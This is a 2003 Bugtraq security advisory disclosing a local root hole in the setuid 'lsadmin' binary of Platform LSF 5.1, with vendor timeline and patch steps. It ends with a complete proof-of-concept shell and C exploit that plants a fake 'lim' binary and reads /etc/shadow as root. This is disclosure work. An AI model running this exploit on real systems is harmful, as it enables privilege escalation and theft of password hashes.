Message-ID: <Pine.LNX.4.44.0305221500440.1821-100000@rubycon.man.szczecin.pl>
Date: Thu, 22 May 2003 15:31:22 +0200 (CEST)
From: Tomasz Grabowski <cadence@...llo.aci.com.pl>
To: bugtraq@...urityfocus.com
Subject: Security advisory: LSF 5.1 local root exploit
Security Advisory
22 May 2003
Local root in LSF 5.1
Name: Load Sharing Facility version 5.1
Severity: High
Vendor URL: http://www.platform.com
Author: Tomasz Grabowski (cadence@....com.pl)
Vendor notified: 25 Feb 2003
Vendor response: 25 Feb 2003
Vendor fix: 19 Mar 2003
Commercial: I'm looking for a new job
Impact: An attacker can gain root privileges by forcing the 'lsadmin'
binary to execute code of the attacker's choice. The 'lsadmin' binary
is setuid root.
Description:
The 'lsadmin' binary has a "ckconfig" command, used to check the
correctness of the config files. Right after it starts, it runs the
external 'lim' binary, taking the path to 'lim' from the LSF_SERVERDIR
variable in the lsf.conf file. A regular user can write his own lsf.conf
file and, by setting the LSF_ENVDIR variable, force 'lsadmin' to use it
instead of the default /etc/lsf.conf. The attacker can therefore point
LSF_SERVERDIR at a directory holding his own 'lim' binary, which
'lsadmin' then executes with setuid root privileges.
How to patch:
1) Download the lsadmin patch from the Platform FTP site:
ftp ftp.platform.com
location: /patches/5.1/patch/sup_by_dev33993/
file: lsadmin5.1_<os>.Z
If you do not have a username/password to access ftp.platform.com, contact
support@...tform.com
2) In LSF_BINDIR, move the old lsadmin to lsadmin.old.
Uncompress and rename the downloaded binary to lsadmin.
Move the new lsadmin to LSF_BINDIR. Make sure its permissions are 4755.
For more information on the patch or related questions, contact
support@...tform.com
Exploit:
# LSF 5.1 'lsadmin' local root exploit
# 2003.03.20 - CADENCE of Lam3rZ
# Proof of concept - for educational purposes only!
# Write the fake 'lim' that 'lsadmin ckconfig' will run as root.
cat <<__END__ > attacker_code.c
#include <stdio.h>
#include <unistd.h>
int main(void) {
    FILE *secret_file;
    FILE *temp_file;
    char one_line[128];
    setuid(0); setgid(0);
    secret_file = fopen("/etc/shadow", "r");
    temp_file = fopen(".temp.file", "w");
    fgets(one_line, 120, secret_file);
    fputs(one_line, temp_file);
    fclose(secret_file); fclose(temp_file);
    return 0;
}
__END__
gcc attacker_code.c -o lim
chmod 777 lim
# Point LSF_SERVERDIR at the current directory, where the fake 'lim' lives.
export LSF_SERVERDIR=.
lsadmin ckconfig
cat .temp.file
rm -f attacker_code.c lim .temp.file
---
Tomasz Grabowski (0-91)4494234
Akademickie Centrum Informatyki
mailto:cadence@....szczecin.pl